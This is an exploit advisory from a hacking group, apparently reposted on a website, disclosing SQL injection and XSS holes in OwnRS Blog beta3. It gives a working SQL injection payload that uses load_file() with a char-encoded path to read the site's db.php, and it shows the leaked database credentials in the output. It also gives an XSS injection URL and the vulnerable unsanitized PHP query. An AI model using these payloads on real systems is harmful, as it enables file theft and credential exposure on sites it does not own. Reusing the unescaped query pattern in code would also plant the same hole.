Home / os / win10

ownrsblog-sqlxss.txt

Posted on 20 June 2008

==============================================================
OwnRS Blog beta3 (SQL/XSS) Multiple Remote Vulnerabilities
==============================================================

,--^----------,--------,-----,-------^--,
| |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`|     /
/ XXXXXX /  `   /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'


AUTHOR : CWH Underground
DATE   : 19 June 2008
SITE   : www.citec.us


#####################################################
APPLICATION : OwnRS
VERSION     : Beta3
VENDOR	     : N/A
DOWNLOAD    : http://downloads.sourceforge.net/ownrs
#####################################################

--- Remote SQL Injection ---

**magic_quote must turn off**

------------------------------
Vulnerable File (clanek.php)
------------------------------

@ Line 66

[+] $vysledek=mysql_query("select * from clanky where id= '" . $id . "'") or die (mysql_error());

----------
Exploit
----------

[+] http://[Target]/[Ownrs_path]/clanek.php?id=[SQL Injection]

-------------
POC Exploit
-------------

[+] http://localhost/own/clanek.php?id=1'/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)),4,5,6,7,8,9,10/**/FROM/**/autori/**/WHERE/**/id='1

When you view source, You can see

@Line 87

[+] <h1><a href="clanek.php?id=1'/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)),4,5,6,7,8,9,10/**/FROM/**/autori/**/WHERE/**/id='1"><?php
[+] $spojeni= mysql_connect(
[+] //server
[+] "localhost",
[+] //login
[+] "xampp",
[+] //heslo
[+] "xampp" );
[+] //databáze
[+] mysql_select_db("databaze",$spojeni);
[+] ?>
[+] </a></h1>
[+] 45<p class="right"><strong><a href="index.php?kat=9">
[+] <div class="cara"><span class="schovat">cara</span></div>


---------------------
Exploit Description
---------------------

This exploit use load_file() to view source files (load_file() can only use with Mysql5+)

load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112))
will open C:xampphtdocsOwndb.php


--- Remote XSS Exploit ---

------------------------------
Vulnerable File (clanek.php)
------------------------------

@ Line 69

[+] <h1><a href="clanek.php?id=<?echo $id?>"><?echo $zaznam["nadpis"]?></a></h1>

---------
Exploit
---------

[+] http://[Target]/[Ownrs_path]/clanek.php?id=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

 

TOP

Malware :

Exploits :